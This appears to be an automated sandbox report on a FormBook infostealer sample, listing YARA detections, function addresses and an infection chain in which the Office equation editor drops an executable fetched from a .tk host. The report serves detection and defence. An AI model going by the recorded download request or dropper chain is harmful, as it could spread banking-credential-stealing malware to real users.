          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{7F12DB12-48BF-46DA-B084-D7B910635C9B}.tmpJump to behavior
          Source: unknownDNS traffic detected: queries for: binatonezx.tk
          Source: global trafficHTTP traffic detected: GET /seasonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\seasonhd72463.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exeJump to dropped file
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: ~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmp.0.drOLE indicator application name: unknown
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D6AF84_2_001D6AF8
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001DEB204_2_001DEB20
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D67C04_2_001D67C0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D99184_2_001D9918
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D8A904_2_001D8A90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D8A804_2_001D8A80
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001DEB104_2_001DEB10
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_001D67AF4_2_001D67AF
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4_2_011094B44_2_011094B4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_004010305_2_00401030
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E4235_2_0041E423
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E5075_2_0041E507
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00402D905_2_00402D90
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041D5A65_2_0041D5A6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041E5B35_2_0041E5B3
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041DE465_2_0041DE46
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00409E605_2_00409E60
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0041DFA25_2_0041DFA2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00402FB05_2_00402FB0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096E0C65_2_0096E0C6
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099D0055_2_0099D005
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098905A5_2_0098905A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009730405_2_00973040
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096E2E95_2_0096E2E9
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A112385_2_00A11238
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009963DB5_2_009963DB
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096F3CF5_2_0096F3CF
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009723055_2_00972305
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009773535_2_00977353
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009BA37B5_2_009BA37B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009814895_2_00981489
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A54855_2_009A5485
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098C5F05_2_0098C5F0
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097351F5_2_0097351F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009746805_2_00974680
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097E6C15_2_0097E6C1
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A126225_2_00A12622
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009F579A5_2_009F579A
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097C7BC5_2_0097C7BC
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A0F8EE5_2_00A0F8EE
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097C85C5_2_0097C85C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099286D5_2_0099286D
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009729B25_2_009729B2
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A1098E5_2_00A1098E
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009869FE5_2_009869FE
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009F59555_2_009F5955
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A23A835_2_00A23A83
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A1CBA45_2_00A1CBA4
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0096FBD75_2_0096FBD7
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009FDBDA5_2_009FDBDA
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00997B005_2_00997B00
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00A0FDDD5_2_00A0FDDD
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A0D3B5_2_009A0D3B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0097CD5B5_2_0097CD5B
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_009A2E2F5_2_009A2E2F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0098EE4C5_2_0098EE4C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00980F3F5_2_00980F3F
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0099DF7C5_2_0099DF7C
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029A0365_2_0029A036
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_002910825_2_00291082
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00292D025_2_00292D02
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_002989125_2_00298912
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029E5CD5_2_0029E5CD
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_0029B2325_2_0029B232
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00295B305_2_00295B30
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_00295B325_2_00295B32
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 5_2_011094B45_2_011094B4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_025C12387_2_025C1238
